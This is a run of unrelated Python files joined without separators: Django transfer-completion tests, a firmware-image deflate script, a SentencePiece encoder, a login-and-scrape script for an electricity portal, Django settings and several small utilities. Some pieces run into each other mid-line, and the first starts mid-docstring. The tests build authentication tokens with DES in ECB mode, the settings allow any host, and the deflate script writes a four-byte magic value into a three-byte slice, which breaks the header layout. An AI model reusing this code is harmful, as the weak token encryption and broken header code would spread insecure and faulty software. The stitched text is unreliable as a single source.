Tests for completion marking: - unauthenticated requests are rejected - marks the particular transfer complete - if not the final transfer, TransferCoordinator stays 'incomplete' - if it is the final transfer, TransferCoordinator marked complete ''' class CompletionMarkingTestCase(TestCase): def setUp(self): self.regular_user = get_user_model().objects.create_user(email=settings.REGULAR_TEST_EMAIL, password='!') # create a couple of resources owned by the regular user: self.r1 = Resource.objects.create( source='google_storage', path='gs://a/b/reg_owned1.txt', 
size=500, owner=self.regular_user, ) self.r2 = Resource.objects.create( source='google_storage', path='gs://a/b/reg_owned2.txt', size=500, owner=self.regular_user, ) self.tc1 = TransferCoordinator.objects.create() self.t1 = Transfer.objects.create( download=True, resource = self.r1, destination = 'dropbox', coordinator = self.tc1, originator = self.regular_user ) self.t2 = Transfer.objects.create( download=True, resource = self.r2, destination = 'dropbox', coordinator = self.tc1, originator = self.regular_user ) # create a couple of resources owned by the regular user representing # uploaded objects self.r3 = Resource.objects.create( source='dropbox', path='gs://a/b/reg_owned3.txt', size=500, owner=self.regular_user, is_active = False ) self.r4 = Resource.objects.create( source='dropbox', path='gs://a/b/reg_owned4.txt', size=500, owner=self.regular_user, is_active = False ) self.tc2 = TransferCoordinator.objects.create() self.t3 = Transfer.objects.create( download=False, resource = self.r3, destination = 'gs://a/b/reg_owned3.txt', coordinator = self.tc2, originator = self.regular_user ) self.t4 = Transfer.objects.create( download=False, resource = self.r4, destination = 'gs://a/b/reg_owned4.txt', coordinator = self.tc2, originator = self.regular_user ) self.tc3 = TransferCoordinator.objects.create() self.t5 = Transfer.objects.create( download=False, resource = self.r3, destination = 'gs://a/b/reg_owned3.txt', coordinator = self.tc3, originator = self.regular_user) def test_single_worker_completion_signal(self): ''' This tests where one of many workers has completed. Not ALL have completed, so the TransferCoordinator stays incomplete ''' # query the database and get the TransferCoordinator and its Transfer instances: tc_pk = self.tc1.pk tc = TransferCoordinator.objects.get(pk=tc_pk) transfers = Transfer.objects.filter(coordinator = tc) d = {} token = settings.CONFIG_PARAMS['token'] obj=DES.new(settings.CONFIG_PARAMS['enc_key'], DES.MODE_ECB) enc_token = obj.encrypt(token) b64_str = base64.encodestring(enc_token) d['token'] = b64_str d['transfer_pk'] = self.t1.pk d['coordinator_pk'] = tc_pk d['success'] = True client = APIClient() url = reverse('transfer-complete') response = client.post(url, d, format='json') self.assertEqual(response.status_code, 200) # query database to see that the Transfer was marked complete, but the # coordinator is still incomplete t = Transfer.objects.get(pk=self.t1.pk) self.assertTrue(t.completed) tc = TransferCoordinator.objects.get(pk=tc_pk) self.assertEqual(tc.completed, False) @mock.patch('transfer_app.views.utils') def test_full_completion_signal(self, mock_utils): ''' This tests where both of two workers have completed. 
ALL have completed, so the TransferCoordinator becomes complete ''' mock_utils.post_completion = mock.MagicMock() # query the database and get the TransferCoordinator and its Transfer instances: tc_pk = self.tc1.pk tc = TransferCoordinator.objects.get(pk=tc_pk) transfers = Transfer.objects.filter(coordinator = tc) token = settings.CONFIG_PARAMS['token'] obj=DES.new(settings.CONFIG_PARAMS['enc_key'], DES.MODE_ECB) enc_token = obj.encrypt(token) b64_str = base64.encodestring(enc_token) d1 = {} d1['token'] = b64_str d1['transfer_pk'] = self.t1.pk d1['coordinator_pk'] = tc_pk d1['success'] = True d2 = {} d2['token'] = b64_str d2['transfer_pk'] = self.t2.pk d2['coordinator_pk'] = tc_pk d2['success'] = True client = APIClient() url = reverse('transfer-complete') response1 = client.post(url, d1, format='json') self.assertEqual(response1.status_code, 200) response2 = client.post(url, d2, format='json') self.assertEqual(response2.status_code, 200) # query database to see that the Transfer was marked complete t1 = Transfer.objects.get(pk=self.t1.pk) self.assertTrue(t1.completed) t2 = Transfer.objects.get(pk=self.t2.pk) self.assertTrue(t2.completed) tc = TransferCoordinator.objects.get(pk=tc_pk) self.assertTrue(tc.completed) @mock.patch('transfer_app.views.utils') def test_failed_transfer_cleans_up_resource(self, mock_utils): ''' This tests where both of two workers have completed. One has failed. We test that the Resource object corresponding to the failed transfer is removed and that we log the failed transfer in the database. ALL transfers have completed, so the TransferCoordinator becomes complete also ''' mock_utils.post_completion = mock.MagicMock() # query the database and get the TransferCoordinator tc_pk = self.tc2.pk tc = TransferCoordinator.objects.get(pk=tc_pk) # check that we do not have any failedtransfers so far: ft = FailedTransfer.objects.all() self.assertTrue(len(ft) == 0) # get the primary key for the Resource which will fail to transfer: failed_resource = self.r3 failed_resource_pk = failed_resource.pk failed_resource_path = failed_resource.path token = settings.CONFIG_PARAMS['token'] obj=DES.new(settings.CONFIG_PARAMS['enc_key'], DES.MODE_ECB) enc_token = obj.encrypt(token) b64_str = base64.encodestring(enc_token) # make the first Transfer fail d1 = {} d1['token'] = b64_str d1['transfer_pk'] = self.t3.pk d1['coordinator_pk'] = tc_pk d1['success'] = False # this transfer was a success: d2 = {} d2['token'] = b64_str d2['transfer_pk'] = self.t4.pk d2['coordinator_pk'] = tc_pk d2['success'] = True # mock the worker machines communicating back: client = APIClient() url = reverse('transfer-complete') response1 = client.post(url, d1, format='json') self.assertEqual(response1.status_code, 200) response2 = client.post(url, d2, format='json') self.assertEqual(response2.status_code, 200) # query database to see that the second Transfer was marked complete t = Transfer.objects.get(pk=self.t4.pk) self.assertTrue(t.completed) # check that the resource was marked active since it succeeded: r_pk = self.t4.resource.pk r = Resource.objects.get(pk=r_pk) self.assertTrue(r.is_active) # check that we added a FailedTransfer to the database: ft = FailedTransfer.objects.all() self.assertTrue(len(ft) == 1) ft = ft[0] self.assertEqual(ft.intended_path, failed_resource_path) # check that the failed transfer led to the resource # being removed with self.assertRaises(ObjectDoesNotExist): r = Resource.objects.get(pk=failed_resource_pk) # check that the TransferCoordinator was marked complete. 
tc = TransferCoordinator.objects.get(pk=tc_pk) self.assertTrue(tc.completed) @mock.patch('transfer_app.views.utils') def test_single_failed_transfer_cleans_up_resource(self, mock_utils): ''' This tests where a single transfer has failed. We test that the Resource object corresponding to the failed transfer is removed and that we log the failed transfer in the database. ALL transfers have completed, so the TransferCoordinator becomes complete also ''' mock_utils.post_completion = mock.MagicMock() # query the database and get the TransferCoordinator tc_pk = self.tc3.pk tc = TransferCoordinator.objects.get(pk=tc_pk) # check that we do not have any failedtransfers so far: ft = FailedTransfer.objects.all() self.assertTrue(len(ft) == 0) # get the primary key for the Resource which will fail to transfer: failed_resource = self.r3 failed_resource_pk = failed_resource.pk failed_resource_path = failed_resource.path token = settings.CONFIG_PARAMS['token'] obj=DES.new(settings.CONFIG_PARAMS['enc_key'], DES.MODE_ECB) enc_token = obj.encrypt(token) b64_str = base64.encodestring(enc_token) # make the first Transfer fail d1 = {} d1['token'] = b64_str d1['transfer_pk'] = self.t5.pk d1['coordinator_pk'] = tc_pk d1['success'] = False # mock the worker machines communicating back: client = APIClient() url = reverse('transfer-complete') response1 = client.post(url, d1, format='json') self.assertEqual(response1.status_code, 200) # check that we added a FailedTransfer to the database: ft = FailedTransfer.objects.all() self.assertTrue(len(ft) == 1) ft = ft[0] self.assertEqual(ft.intended_path, failed_resource_path) # check that the failed transfer led to the resource # being removed with self.assertRaises(ObjectDoesNotExist): r = Resource.objects.get(pk=failed_resource_pk) # check that the TransferCoordinator was marked complete. tc = TransferCoordinator.objects.get(pk=tc_pk) self.assertTrue(tc.completed) a_t = all_transfers = Transfer.objects.filter(coordinator = tc) print(a_t) for x in a_t: print('here is x: %s' % x) self.assertTrue(mock_utils.post_completion.called) def test_completion_signal_with_wrong_token_is_rejected(self): ''' This tests where a bad token is sent. 
        Should reject with 404
        '''
        # query the database and get the TransferCoordinator and its Transfer instances:
        tc = TransferCoordinator.objects.get(pk=self.tc1.pk)
        transfers = Transfer.objects.filter(coordinator=tc)

        bad_token = ''
        obj = DES.new(settings.CONFIG_PARAMS['enc_key'], DES.MODE_ECB)
        enc_token = obj.encrypt(bad_token)
        bad_b64_str = base64.encodestring(enc_token)

        d1 = {}
        d1['token'] = bad_b64_str
        d1['transfer_pk'] = 1
        d1['coordinator_pk'] = 1
        d1['success'] = True

        client = APIClient()
        url = reverse('transfer-complete')
        response1 = client.post(url, d1, format='json')
        self.assertEqual(response1.status_code, 404)

    def test_incorrect_transfer_pk_on_completion(self):
        '''
        This tests where an incorrect pk is given for the transfer
        '''
        # query the database and get the TransferCoordinator and its Transfer instances:
        tc = TransferCoordinator.objects.get(pk=self.tc1.pk)
        transfers = Transfer.objects.filter(coordinator=tc)

        d = {}
        token = settings.CONFIG_PARAMS['token']
        obj = DES.new(settings.CONFIG_PARAMS['enc_key'], DES.MODE_ECB)
        enc_token = obj.encrypt(token)
        b64_str = base64.encodestring(enc_token)
        d['token'] = b64_str
        d['transfer_pk'] = 100  # an invalid pk
        d['success'] = True

        client = APIClient()
        url = reverse('transfer-complete')
        response = client.post(url, d, format='json')
        self.assertEqual(response.status_code, 400)

    def test_bad_payload_on_completion(self):
        '''
        This tests where required info is missing in the request
        '''
        # query the database and get the TransferCoordinator and its Transfer instances:
        tc = TransferCoordinator.objects.get(pk=self.tc1.pk)
        transfers = Transfer.objects.filter(coordinator=tc)

        d = {}
        token = settings.CONFIG_PARAMS['token']
        obj = DES.new(settings.CONFIG_PARAMS['enc_key'], DES.MODE_ECB)
        enc_token = obj.encrypt(token)
        b64_str = base64.encodestring(enc_token)
        d['token'] = b64_str
        # note: missing the transfer_pk key
        d['success'] = True

        client = APIClient()
        url = reverse('transfer-complete')
        response = client.post(url, d, format='json')
        self.assertEqual(response.status_code, 400)

    @mock.patch('transfer_app.utils.send_email')
    def test_post_completion_with_only_failures(self, mock_email_send):
        '''
        If none of the transfers are successful, test that the correct behavior happens
        '''
        from transfer_app.utils import post_completion

        # this coord does not have any Transfer objects associated with it.
empty_coordinator = TransferCoordinator.objects.create() post_completion(empty_coordinator, [settings.REGULAR_TEST_EMAIL,]) self.assertTrue(mock_email_send.called) examples/tqt/shiftadder/utils.py1-10 import os, shutil def create_exp_dir(path, scripts_to_save=None): if not os.path.exists(path): os.mkdir(path) print('Experiment dir : {}'.format(path)) if scripts_to_save is not None: os.mkdir(os.path.join(path, 'scripts')) for script in scripts_to_save: dst_file = os.path.join(path, 'scripts', os.path.basename(script)) shutil.copyfile(script, dst_file) def exp_record(note, args_to_save, save_path): f = open(note, 'a') f.write('%s\t%s\n' % (save_path, args_to_save)) f.close() """ Creational: abstract factory Car => Benz, Bmw => Suv, Coupe benz suv => gla, glc bmw suv => x1, x2 benz coupe => cls, E-class bmw coupe => m2, m4 """ from abc import ABC, abstractmethod class Car(ABC): @abstractmethod def call_suv(self): pass @abstractmethod def call_coupe(self): pass # ------------------------------------------------------------- class Benz(Car): def call_suv(self): return Gla() def call_coupe(self): return Cls() # ------------------------------------------------------------- class Bmw(Car): def call_suv(self): return X1() def call_coupe(self): return M2() # ------------------------------------------------------------- class Suv(ABC): @abstractmethod def creating_suv(self): pass class Coupe(ABC): @abstractmethod def creating_coupe(self): pass # ------------------------------------------------------------- class Gla(Suv): def creating_suv(self): print("This is your suv benz gla. . . ") class X1(Suv): def creating_suv(self): print("This is your suv bmw x1. . .") # ------------------------------------------------------------- class Cls(Coupe): def creating_coupe(self): print("This is your coupe benz cls. . .") class M2(Coupe): def creating_coupe(self): print("This is your coupe bmw m2. . .") # ------------------------------------------------------------- def client_suv(order): suv = order.call_suv() suv.creating_suv() def client_coupe(order): coupe = order.call_coupe() coupe.creating_coupe() # ------------------------------------------------------------- """Test the app""" client_coupe(Bmw()) client_coupe(Benz()) client_suv(Benz()) client_suv(Bmw()) 1-10 #!/usr/bin/env python3 #============================================================================== # # MPFS HSS Deflate Stage # # Copyright 2021 Microchip Corporation. # # SPDX-License-Identifier: MIT # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to # deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. 
# # # This script takes an HSS-L2LIM image and compresses it for storage in eNVM # using Deflate # #============================================================================== import argparse import zlib import sys import base64 def deflate(data, compressionLevel=4): compressor = zlib.compressobj(level=compressionLevel, method=zlib.DEFLATED, wbits=zlib.MAX_WBITS, memLevel=zlib.DEF_MEM_LEVEL, strategy=0) deflatedBytes = compressor.compress(data) + compressor.flush() return deflatedBytes def inflate(data): decompressor = zlib.decompressobj(-zlib.MAX_WBITS) inflatedBytes = decompressor.decompress(data) + decompressor.flush() return inflatedBytes def get_script_version(): return "1.0.0" def get_header_bytes(compressedCrc, originalCrc, compressedImageLen, originalImageLen): # # This function must output a header that is in-sync with # include/hss-types.h ... # # #pragma pack(8) # struct HSS_CompressedImage { # uint32_t magic; # uint32_t version; # size_t headerLength; # uint32_t headerCrc; # uint32_t compressedCrc; # uint32_t originalCrc; # size_t compressedImageLen; # size_t originalImageLen; # uint8_t hash[32]; # uint8_t ecdsaSig[32]; # }; # #define mHSS_COMPRESSED_MAGIC (0xC08B8355u) # #define mHSS_COMPRESSED_VERSION_FASTLZ 1u # #define mHSS_COMPRESSED_VERSION_MINIZ 2u # # offsetof(magic): 0 # offsetof(version): 4 # offsetof(headerLength): 8 # offsetof(headerCrc): 16 # offsetof(compressedCrc): 20 # offsetof(originalCrc): 24 # offsetof(compressedImageLen): 32 # offset_of(originalImageLen): 40 # offsetof(hash): 48 # offsetof(ecdsaSig): 80 header = bytearray(112) header[0:3] = 0xC08B8355.to_bytes(4, "little") # magic header[4:8] = 0x2.to_bytes(4, "little") # version header[8:16] = 0x0.to_bytes(8, "little") # headerLength placeholder header[16:20]= 0x0.to_bytes(4, "little") # headerCrc placeholder header[20:24] = compressedCrc.to_bytes(4, "little") # compressedCrc header[24:32] = originalCrc.to_bytes(4, "little") # originalCrc header[32:40] = compressedImageLen.to_bytes(8, "little") # compressedImageLen header[40:48] = originalImageLen.to_bytes(8, "little") # originalImageLen header[48:80] = bytearray(32) # hash32 placeholder header[80:112] = bytearray(32) # ecdsaSig32 placeholder headerLength = len(header) header[8:12] = headerLength.to_bytes(4, "little") # headerLength header[12:16] = 0x0.to_bytes(4, "little") # padding headerCrc = zlib.crc32(header) header[16:20] = headerCrc.to_bytes(4, "little") # headerCrc if (args.verbose): print("Header length is %d (0x%08X)" %(headerLength, headerLength) ) print("Header CRC is 0x%08X" %(headerCrc) ) return header def main(): parser = argparse.ArgumentParser(description = 'Deflate HSS-L2LIM image') parser.add_argument('--verbose', '-v', action='count', default=0) parser.add_argument('imageFileIn') parser.add_argument('deflatedFileOut') global args args = parser.parse_args() if (args.verbose): print("Reading image from " + args.imageFileIn) with open(args.imageFileIn, 'rb') as fileIn: imageData = fileIn.read() imageLen = len(imageData) if (args.verbose): print("Reading %d (0x%08X) bytes" %(imageLen, imageLen) ) imageCrc = zlib.crc32(imageData) if (args.verbose): print("Image CRC is 0x%08X" %(imageCrc) ) print("Deflating...") deflatedData = deflate(imageData) deflatedLen = len(deflatedData) deflatedCrc = zlib.crc32(deflatedData) if (args.verbose): print("Deflated CRC is 0x%08X" %(deflatedCrc) ) print("Deflated length %d (0x%08X) bytes" %(deflatedLen, deflatedLen) ) print("Outputting to " + args.deflatedFileOut) headerData = 
get_header_bytes(compressedCrc=deflatedCrc, originalCrc=imageCrc, compressedImageLen=deflatedLen, originalImageLen=imageLen) with open(args.deflatedFileOut, "wb") as fileOut: outputSize = fileOut.write(headerData) outputSize += fileOut.write(deflatedData) if (args.verbose): print("Wrote %d (0x%08X) bytes" %(outputSize, outputSize) ) # # # if __name__ == "__main__": main() from rdflib import Graph import csv import matplotlib as mpl import matplotlib.pyplot as plt import numpy as np from pprint import pprint from optparse import OptionParser import os def main(): parser = OptionParser(usage="usage: %prog [options]") parser.add_option('-i', '--input-file', action='store', help='The input file containing RDF triples') (options, args) = parser.parse_args() if not options.input_file: parser.print_help(); exit(1) g = Graph() if options.input_file.endswith('nt'): g.parse(options.input_file, format='nt') elif options.input_file.endswith('ttl'): g.parse(options.input_file, format='turtle') query_amount_triples = """ SELECT (COUNT(*) as ?amountTriples) WHERE { ?s ?p ?o . } """ query_amount_observations = """ PREFIX qb: SELECT (COUNT(*) as ?amountObservations) WHERE { ?obs a qb:Observation . } """ print("Number of triples:") triple_amount = g.query(query_amount_triples) for t in triple_amount: print(t) print("Number of DataCube observations:") observations_amount = g.query(query_amount_observations) for o in observations_amount: print(o) main() from flask import jsonify import flask @app.route('/v1/domains', methods=['GET']) def domain_list(): return jsonify( status = 'success', data = None )widget = WidgetDefault() widget.width = 20 widget.background = "Fill" commonDefaults["ScrollBarWidget"] = widget def generateScrollBarWidget(file, screen, bar, parentName): name = bar.getName() file.write(" %s = leScrollBarWidget_New();" % (name)) generateBaseWidget(file, screen, bar) orientation = getOrientation(bar.getOrientation().toString()) if orientation != "LE_ORIENTATION_VERTICAL": file.write(" %s->fn->setOrientation(%s, LE_ORIENTATION_HORIZONTAL, LE_FALSE);" % (name, name)) writeSetInt(file, name, "MaximumValue", bar.getMax(), 100) writeSetInt(file, name, "ExtentValue", bar.getExtent(), 10) writeSetInt(file, name, "StepSize", bar.getStep(), 1) writeSetInt(file, name, "ScrollValue", bar.getValue(), 0) writeEvent(file, name, bar, "ValueChangedEvent", "ValueChangedEventCallback", "OnValueChanged") file.write(" %s->fn->addChild(%s, (leWidget*)%s);" % (parentName, parentName, name)) file.writeNewLine() def generateScrollBarEvent(screen, widget, event, genActions): text = "" if event.name == "ValueChangedEvent": text += "void %s_OnValueChanged(%s)\n" % (widget.getName(), getWidgetVariableName(widget)) text += generateActions(widget, event, genActions, None, None) return text def generateScrollBarAction(text, variables, owner, event, action): name = action.targetName if action.actionID == "SetOrientation": val = getOrientation(getActionArgumentValue(action, "Orientation")) writeActionFunc(text, action, "setOrientation", [val, "LE_TRUE"]) elif action.actionID == "SetMax": val = getActionArgumentValue(action, "Max") writeActionFunc(text, action, "setMaximumValue", [val]) elif action.actionID == "SetExtent": val = getActionArgumentValue(action, "Extent") writeActionFunc(text, action, "setExtentValue", [val]) elif action.actionID == "SetValue": val = getActionArgumentValue(action, "Value") writeActionFunc(text, action, "setScrollValue", [val]) elif action.actionID == "SetValuePercent": val = 
getActionArgumentValue(action, "Value") writeActionFunc(text, action, "setScrollPercentage", [val]) elif action.actionID == "SetStepSize": val = getActionArgumentValue(action, "Size") writeActionFunc(text, action, "setStepSize", [val]) elif action.actionID == "StepBackward": writeActionFunc(text, action, "stepBackward", []) elif action.actionID == "StepForward": writeActionFunc(text, action, "stepForward", []) else: generateWidgetAction(text, variables, owner, event, action)import tensorflow as tf import sentencepiece as sp from typing import List def create_text_encoder(encoder_type: str, model_file: str): if encoder_type == "sentencepiece": return ParsingOps(model_file) elif encoder_type == "sentencepieceWithSplitSymbol": return ParsingOps(model_file,"") class ParsingOps(object): def __init__(self, model_file: str, shift_token: int = 103, split_symbol: str = ""): self._tokenizer = sp.SentencePieceProcessor() self._model = tf.io.gfile.GFile(model_file, "rb").read() self._tokenizer.LoadFromSerializedProto(self._model) self._split_symbol = split_symbol self._shift_token = shift_token # id_0 = pad, id_1 = eos @property def vocabulary_size(self) -> int: return self._tokenizer.GetPieceSize() + self._shift_token def encode(self, text: str) -> List[int]: if self._split_symbol: text = text.replace("\n", self._split_symbol) ids = self._tokenizer.EncodeAsIds(text) ids = [i + self._shift_token if i > 1 else i for i in ids] return ids def decode(self, ids:List[int]) -> str: ids = [i - self._shift_token if i > 1 + self._shift_token else i for i in ids] text = self._tokenizer.DecodeIds(ids) if self._split_symbol: text = text.replace(self._split_symbol, "\n") return text shirayu/koyo_elec-dumperdump.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- ''' Download koyo electric data ''' import argparse import urllib.request import sys import http.cookiejar import re import json import codecs LOGIN_URL = 'https://www.k-epco.net/koyo/portal' LOGIN_POST_URL = 'https://www.k-epco.net/koyo/portal/login' GRAPH_URL = 'https://www.k-epco.net/koyo/portal/graph/daily/?data_month=' def get_token(opener): ''' Get login token ''' res = opener.open(urllib.request.Request(url=LOGIN_URL)) if res.status != 200: sys.exit(1) body = res.read().decode('utf8') token = re.search(r'name="_token" value="([^"]*)"', body).group(1) return token def login(opener, token, email, password): ''' login ''' data = { '_token': token, 'email': email, 'password': password, } encoded_post_data = json.dumps(data).encode(encoding='ascii') res = opener.open(urllib.request.Request(url=LOGIN_POST_URL, headers={"Content-Type": "application/json"}, data=encoded_post_data, method='POST')) body = res.read().decode('utf8') if res.status != 200 or "間違って" in body: sys.exit(1) def get_page(opener, year, month): ''' Get month data ''' res = opener.open(urllib.request.Request(url="%s%04d%02d" % (GRAPH_URL, year, month))) if res.status != 200: sys.exit(1) body = res.read().decode('utf8') data = re.search(r'columns: (.*)\n', body).group(1).rstrip(',') return data def operation(cfg, year, month): ''' Stub ''' opener = urllib.request.build_opener( urllib.request.HTTPCookieProcessor( http.cookiejar.CookieJar())) token = get_token(opener) login(opener, token, cfg["id"], cfg["password"]) data = get_page(opener, year, month) return data def main(): ''' Parse arguments ''' oparser = argparse.ArgumentParser() oparser.add_argument("-c", "--config", dest="config", default=None, required=True) oparser.add_argument("-o", "--output", dest="output") 
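# --------------------------------------------------------------------------
# A minimal, dependency-free sketch of the id-shifting convention used by the
# ParsingOps encoder defined above: ids 0 (pad) and 1 (eos) are reserved, and
# every other SentencePiece id is shifted up by `shift_token` on encode and
# shifted back down on decode. The sample id list is illustrative only.
SHIFT_TOKEN = 103  # matches the ParsingOps default

def _shift_ids(ids):
    return [i + SHIFT_TOKEN if i > 1 else i for i in ids]

def _unshift_ids(ids):
    return [i - SHIFT_TOKEN if i > 1 + SHIFT_TOKEN else i for i in ids]

_raw = [0, 1, 2, 57]  # hypothetical tokenizer output
assert _unshift_ids(_shift_ids(_raw)) == _raw
# --------------------------------------------------------------------------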
oparser.add_argument("-y", "--year", dest="year", type=int, required=True) oparser.add_argument("-m", "--month", dest="month", type=int, required=True) opts = oparser.parse_args() cfg = None with open(opts.config) as fhdl: cfg = json.loads(fhdl.read()) data = operation(cfg, opts.year, opts.month) with codecs.open(opts.output, "w", "utf8") as outf: outf.write(data) outf.write("\n") if __name__ == '__main__': main() from timeatlas.time_series_dataset import TimeSeriesDataset from timeatlas.models.NN.util import chunkify from .base_dataset import BaseDataset class TimeSeriesPredictionDataset(BaseDataset): """ A DataLoader for the prediction of a TimeSeries n next steps, where X: TimeSeries n previous steps y: next step of the TimeSeries """ def __init__(self, timeseriesdataset: TimeSeriesDataset, n: int or None): """ Args: data: TimeSeriesDataset n: number of previous steps """ super(TimeSeriesPredictionDataset, self).__init__(tsd=timeseriesdataset) self.data, self.labels = chunkify(tsd=timeseriesdataset.data, seq_len=n) def __len__(self): return len(self.data) def __getitem__(self, item): return self.data[item], self.labels[item] # coding: utf-8 import os from datetime import timedelta BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__))) # Set template_path and template_dir TEMPLATE_PATH = os.path.join(BASE_DIR, 'templates') TEMPLATE_DIRS = ( TEMPLATE_PATH, ) # Set databases_name DATABASES_NAME = os.path.join(BASE_DIR, 'mysite.db') ADMINS = ( ('', ''), ) DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'. 'NAME': DATABASES_NAME, # Or path to database file if using sqlite3. # The following settings are not used with sqlite3: 'USER': '', 'PASSWORD': '', 'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP. 'PORT': '', # Set to empty string for default. } } # Hosts/domain names that are valid for this site; required if DEBUG is False # See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts ALLOWED_HOSTS = ['*'] # Local time zone for this installation. Choices can be found here: # http://en.wikipedia.org/wiki/List_of_tz_zones_by_name # although not all choices may be available on all operating systems. # In a Windows environment this must be set to your system time zone. TIME_ZONE = 'America/Los_Angeles' # Language code for this installation. All choices can be found here: # http://www.i18nguy.com/unicode/language-identifiers.html LANGUAGE_CODE = 'en-us' # grr, Django testing framework stupidly uses this as signal that # code is pre-1.6, whereas it STILL seems to be required for app to run. SITE_ID = 1 # required to stop false positive warning messages SILENCED_SYSTEM_CHECKS = ['1_6.W001'] # If you set this to False, Django will make some optimizations so as not # to load the internationalization machinery. USE_I18N = True # If you set this to False, Django will not format dates, numbers and # calendars according to the current locale. USE_L10N = True # If you set this to False, Django will not use timezone-aware datetimes. USE_TZ = True # Absolute filesystem path to the directory that will hold user-uploaded files. # Example: "/var/www/example.com/media/" MEDIA_ROOT = '' # URL that handles the media served from MEDIA_ROOT. Make sure to use a # trailing slash. # Examples: "http://example.com/media/", "http://media.example.com/" MEDIA_URL = '' # Absolute path to the directory static files should be collected to. 
# Don't put anything in this directory yourself; store your static files # in apps' "static/" subdirectories and in STATICFILES_DIRS. # Example: "/var/www/example.com/static/" STATIC_ROOT = '' # URL prefix for static files. # Example: "http://example.com/static/", "http://static.example.com/" STATIC_URL = '/static/' # Additional locations of static files STATICFILES_DIRS = ( # Put strings here, like "/home/html/static" or "C:/www/django/static". # Always use forward slashes, even on Windows. # Don't forget to use absolute paths, not relative paths. ) # List of finder classes that know how to find static files in # various locations. STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', # 'django.contrib.staticfiles.finders.DefaultStorageFinder', ) # URL of the login page. LOGIN_URL = '/login/' LOGIN_REDIRECT_URL = '/done/' URL_PATH = '' # List of callables that know how to import templates from various sources. TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', # 'django.template.loaders.eggs.Loader', ) MIDDLEWARE_CLASSES = ( 'django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', # Uncomment the next line for simple clickjacking protection: 'django.middleware.clickjacking.XFrameOptionsMiddleware', 'ct.middleware.MySocialAuthExceptionMiddleware', ) ROOT_URLCONF = 'mysite.urls' # Python dotted path to the WSGI application used by Django's runserver. WSGI_APPLICATION = 'mysite.wsgi.application' INSTALLED_APPS = ( 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.sites', 'django.contrib.messages', 'django.contrib.staticfiles', # Uncomment the next line to enable the admin: 'django.contrib.admin', # Uncomment the next line to enable admin documentation: # 'django.contrib.admindocs', 'crispy_forms', 'ct', 'fsm', # LTI 'lti', # Socials 'social.apps.django_app.default', 'psa', ) CRISPY_TEMPLATE_PACK = 'bootstrap3' SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer' TEMPLATE_CONTEXT_PROCESSORS = ( 'django.contrib.auth.context_processors.auth', 'django.core.context_processors.debug', 'django.core.context_processors.i18n', 'django.core.context_processors.media', 'django.core.context_processors.static', 'django.core.context_processors.tz', 'django.contrib.messages.context_processors.messages', 'social.apps.django_app.context_processors.backends', 'social.apps.django_app.context_processors.login_redirect', 'psa.context_processors.debug_settings', ) AUTHENTICATION_BACKENDS = ( 'social.backends.twitter.TwitterOAuth', 'social.backends.facebook.FacebookOAuth2', 'social.backends.google.GoogleOAuth2', 'social.backends.linkedin.LinkedinOAuth2', 'social.backends.khanacademy.KhanAcademyOAuth1', 'psa.custom_backends.EmailAuth', 'django.contrib.auth.backends.ModelBackend', ) SOCIAL_AUTH_PIPELINE = ( 'social.pipeline.social_auth.social_details', 'social.pipeline.social_auth.social_uid', 'social.pipeline.social_auth.auth_allowed', 'psa.pipeline.social_user', 'social.pipeline.user.get_username', 'psa.pipeline.custom_mail_validation', 'psa.pipeline.associate_by_email', 'social.pipeline.user.create_user', 'psa.pipeline.validated_user_details', # 'psa.pipeline.password_ask', 
'psa.pipeline.associate_user', 'social.pipeline.social_auth.load_extra_data', 'social.pipeline.user.user_details', ) SOCIAL_AUTH_DISCONNECT_PIPELINE = ( # 'psa.pipeline.password_check', 'social.pipeline.disconnect.allowed_to_disconnect', 'social.pipeline.disconnect.get_entries', 'social.pipeline.disconnect.revoke_tokens', 'social.pipeline.disconnect.disconnect' ) PROTECTED_USER_FIELDS = ['first_name', 'last_name', 'email'] FORCE_EMAIL_VALIDATION = True PASSWORDLESS = True SOCIAL_AUTH_EMAIL_VALIDATION_FUNCTION = 'psa.mail.send_validation' SOCIAL_AUTH_EMAIL_VALIDATION_URL = '/email-sent/' SOCIAL_AUTH_STRATEGY = 'psa.custom_django_strategy.CustomDjangoStrategy' SOCIAL_AUTH_STORAGE = 'psa.custom_django_storage.CustomDjangoStorage' SOCIAL_AUTH_GOOGLE_OAUTH2_SCOPE = [ 'https://www.googleapis.com/auth/userinfo.email', 'https://www.googleapis.com/auth/userinfo.profile' ] # Facebook email scope declaring SOCIAL_AUTH_FACEBOOK_SCOPE = ['email'] # Add email to requested authorizations. SOCIAL_AUTH_LINKEDIN_OAUTH2_SCOPE = ['r_basicprofile', 'r_emailaddress'] # Add the fields so they will be requested from linkedin. SOCIAL_AUTH_LINKEDIN_OAUTH2_FIELD_SELECTORS = 